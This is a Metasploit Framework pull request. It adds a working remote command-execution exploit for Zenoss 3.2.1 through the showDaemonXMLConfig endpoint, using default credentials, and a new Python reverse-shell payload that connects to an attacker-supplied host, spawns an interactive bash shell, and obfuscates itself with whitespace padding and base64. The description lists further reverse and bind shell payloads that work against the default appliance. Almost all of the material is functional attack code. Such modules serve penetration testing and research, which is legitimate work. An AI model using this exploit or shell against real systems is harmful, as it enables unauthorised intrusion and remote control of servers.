### PR TITLE
Add Zenoss <= 3.2.1 exploit and Python payload

### DIFF
--- a/modules/exploits/linux/http/zenoss_3.2.1_showdaemonxmlconfig_exec.rb
+++ b/modules/exploits/linux/http/zenoss_3.2.1_showdaemonxmlconfig_exec.rb
@@ -34,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					'Brendan Coles <bcoles[at]gmail[dot]com>', # Discovery and exploit
 				],
 			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision: 1 $',
+			'Version'        => '$Revision: 2 $',
 			'Privileged'     => false,
 			'Arch'           => ARCH_CMD,
 			'Platform'       => 'unix',
@@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		register_options([
 			Opt::RPORT(8080),
-			OptString.new('USERNAME', [true, 'The Zenoss username', 'zenoss']),
+			OptString.new('USERNAME', [true, 'The Zenoss username', 'admin']),
 			OptString.new('PASSWORD', [true, 'The Zenoss password', 'zenoss'])
 		], self.class)
 	end
@@ -91,19 +91,18 @@ class Metasploit3 < Msf::Exploit::Remote
 		# send payload
 		print_status("#{@peer} - Sending payload to Zenoss (#{command.length.to_s} bytes)")
 		begin
-			res = send_request_raw({
+			res = send_request_cgi({
 				'method'    => 'POST',
 				'uri'       => "/zport/About/showDaemonXMLConfig",
 				'data'      => "#{postdata}",
-				'headers'   => {
-					'Content-Length' => postdata.length,
-				}
 			})
 			if res and res['Bobo-Exception-Type'] =~ /^Unauthorized$/
 				print_error("#{@peer} - Authentication failed. Incorrect username/password.")
 				return
 			end
 			print_status("#{@peer} - Sent payload successfully")
+		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+			print_error("#{@peer} - Connection failed")
 		rescue
 			print_error("#{@peer} - Sending payload failed")
 		end

--- a/modules/exploits/linux/http/zenoss_3.2.1_showdaemonxmlconfig_exec.rb
+++ b/modules/exploits/linux/http/zenoss_3.2.1_showdaemonxmlconfig_exec.rb
@@ -1,0 +1,116 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = GoodRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Zenoss <= 3.2.1 showDaemonXMLConfig Command Execution',
+			'Description'    => %q{
+				This module exploits a command execution vulnerability in Zenoss <= 3.2.1
+				which could be abused to allow authenticated users to execute arbitrary
+				code under the context of the 'zenoss' user. The show_daemon_xml_configs()
+				function in the 'ZenossInfo.py' script calls Popen() with user
+				controlled data from the 'daemon' parameter.
+			},
+			'References'     =>
+				[
+					['URL', 'http://itsecuritysolutions.org/2012-07-30-zenoss-3.2.1-multiple-security-vulnerabilities/'],
+					#['OSVDB', 'None'],
+					#['CVE', 'None'],
+				],
+			'Author'         =>
+				[
+					'Brendan Coles <bcoles[at]gmail[dot]com>', # Discovery and exploit
+				],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision: 1 $',
+			'Privileged'     => false,
+			'Arch'           => ARCH_CMD,
+			'Platform'       => 'unix',
+			'Payload'        =>
+				{
+					'Space'       => 1024,
+					'BadChars'    => "\x00",
+					'DisableNops' => true,
+				},
+			'Compat'	=>
+				{
+					'PayloadType' => 'cmd',
+					'RequiredCmd' => 'generic python perl bash',
+				},
+			'Targets'        =>
+				[
+					[
+						'Automatic Targeting', { 'auto' => true }
+					],
+				],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Jul 30 2012'
+		))
+
+		register_options([
+			Opt::RPORT(8080),
+			OptString.new('USERNAME', [true, 'The Zenoss username', 'zenoss']),
+			OptString.new('PASSWORD', [true, 'The Zenoss password', 'zenoss'])
+		], self.class)
+	end
+
+	def check
+
+		# retrieve software version from login page
+		res = send_request_raw({
+			'method' => "GET",
+			'uri'    => "/zport/acl_users/cookieAuthHelper/login_form"
+		})
+		return Exploit::CheckCode::Unknown    if res.nil?
+		return Exploit::CheckCode::Vulnerable if res.body =~ /<p>Copyright &copy; 2005-20[\d]{2} Zenoss, Inc\. \| Version\s+<span>3\.2\.1<\/span>/
+		return Exploit::CheckCode::Detected   if res.body =~ /<link rel="shortcut icon" type="image\/x\-icon" href="\/zport\/dmd\/favicon\.ico" \/>/
+		return Exploit::CheckCode::Safe
+
+	end
+
+	def exploit
+
+		@peer    = "#{rhost}:#{rport}"
+		username = datastore['USERNAME']
+		password = datastore['PASSWORD']
+		command  = URI.encode(payload.encoded)+"%26"
+		postdata = "__ac_name=#{username}&__ac_password=#{password}&daemon=#{command}"
+
+		# send payload
+		print_status("#{@peer} - Sending payload to Zenoss (#{command.length.to_s} bytes)")
+		begin
+			res = send_request_raw({
+				'method'    => 'POST',
+				'uri'       => "/zport/About/showDaemonXMLConfig",
+				'data'      => "#{postdata}",
+				'headers'   => {
+					'Content-Length' => postdata.length,
+				}
+			})
+			if res and res['Bobo-Exception-Type'] =~ /^Unauthorized$/
+				print_error("#{@peer} - Authentication failed. Incorrect username/password.")
+				return
+			end
+			print_status("#{@peer} - Sent payload successfully")
+		rescue
+			print_error("#{@peer} - Sending payload failed")
+		end
+
+		handler
+
+	end
+
+end
+

--- a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb
+++ b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb
@@ -6,7 +6,6 @@
 ##
 
 require 'msf/core'
-require 'msf/core/handler/reverse_tcp'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GoodRanking
@@ -15,9 +14,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'Zenoss <= 3.2.1 showDaemonXMLConfig Command Execution',
+			'Name'           => 'Zenoss 3 showDaemonXMLConfig Command Execution',
 			'Description'    => %q{
-				This module exploits a command execution vulnerability in Zenoss <= 3.2.1
+				This module exploits a command execution vulnerability in Zenoss 3.x
 				which could be abused to allow authenticated users to execute arbitrary
 				code under the context of the 'zenoss' user. The show_daemon_xml_configs()
 				function in the 'ZenossInfo.py' script calls Popen() with user
@@ -31,10 +30,10 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'Author'         =>
 				[
-					'Brendan Coles <bcoles[at]gmail[dot]com>', # Discovery and exploit
+					'Brendan Coles <bcoles[at]gmail.com>', # Discovery and exploit
 				],
 			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision: 2 $',
+			'Version'        => '$Revision: 3 $',
 			'Privileged'     => false,
 			'Arch'           => ARCH_CMD,
 			'Platform'       => 'unix',
@@ -68,15 +67,21 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def check
 
+		@peer = "#{rhost}:#{rport}"
+
 		# retrieve software version from login page
-		res = send_request_raw({
-			'method' => "GET",
-			'uri'    => "/zport/acl_users/cookieAuthHelper/login_form"
-		})
-		return Exploit::CheckCode::Unknown    if res.nil?
-		return Exploit::CheckCode::Vulnerable if res.body =~ /<p>Copyright &copy; 2005-20[\d]{2} Zenoss, Inc\. \| Version\s+<span>3\.2\.1<\/span>/
-		return Exploit::CheckCode::Detected   if res.body =~ /<link rel="shortcut icon" type="image\/x\-icon" href="\/zport\/dmd\/favicon\.ico" \/>/
-		return Exploit::CheckCode::Safe
+		begin
+			res = send_request_raw({
+				'method' => "GET",
+				'uri'    => "/zport/acl_users/cookieAuthHelper/login_form"
+			})
+			return Exploit::CheckCode::Vulnerable if res.body =~ /<p>Copyright &copy; 2005-20[\d]{2} Zenoss, Inc\. \| Version\s+<span>3\./
+			return Exploit::CheckCode::Detected   if res.body =~ /<link rel="shortcut icon" type="image\/x\-icon" href="\/zport\/dmd\/favicon\.ico" \/>/
+			return Exploit::CheckCode::Safe
+		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp
+			print_error("#{@peer} - Connection failed")
+		end
+		return Exploit::CheckCode::Unknown
 
 	end
 

--- a/modules/payloads/singles/cmd/unix/reverse_python.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python.rb
@@ -1,0 +1,61 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'        => 'Unix Command Shell, Reverse TCP (via Python)',
+			'Version'     => '$Revision: 1 $',
+			'Description' => 'Connect back and create a command shell via Python',
+			'Author'      => 'Brendan Coles <bcoles[at]gmail.com>',
+			'License'     => MSF_LICENSE,
+			'Platform'    => 'unix',
+			'Arch'        => ARCH_CMD,
+			'Handler'     => Msf::Handler::ReverseTcp,
+			'Session'     => Msf::Sessions::CommandShell,
+			'PayloadType' => 'cmd',
+			'RequiredCmd' => 'python',
+			'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+		))
+		register_options([
+			OptString.new('SHELL', [true, 'The system shell to use.', '/bin/bash'])
+		], self.class)
+	end
+
+	def generate
+		return super + command_string
+	end
+
+	#
+	# Generate random whitespace
+	#
+
+	def random_padding
+		" "*rand(10)
+	end
+
+	#
+	# Generate command string
+	#
+
+	def command_string
+		raw_cmd = "import socket,subprocess,os;host=\"#{datastore['LHOST']}\";port=#{datastore['LPORT']};s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"#{datastore['SHELL']}\",\"-i\"]);"
+		obfuscated_cmd = raw_cmd.gsub(/,/, "#{random_padding},#{random_padding}").gsub(/;/, "#{random_padding};#{random_padding}")
+		encoded_cmd = Rex::Text.encode_base64(obfuscated_cmd)
+		"python -c \"exec('#{encoded_cmd}'.decode('base64'))\""
+	end
+
+end


### PR DESCRIPTION
- modules/exploits/linux/http/zenoss_3.2.1_showdaemonxmlconfig_exec.rb
- modules/payloads/singles/cmd/unix/reverse_python.rb

Product:  Zenoss <= 3.2.1
Homepage: http://www.zenoss.com/
Advisory: http://itsecuritysolutions.org/2012-07-30-zenoss-3.2.1-multiple-security-vulnerabilities/

Zenoss 3.2.1 is distributed as a Virtual Machine image based on
CentOS 2.6.18-164.el5.

The telnet binary is not available so the default payload 
`cmd/unix/reverse' will not work.

These payloads will work in the default Zenoss environment:

cmd/unix/bind_perl
cmd/unix/reverse_bash
cmd/unix/reverse_perl
cmd/unix/reverse_python
generic/custom
generic/shell_reverse_tcp
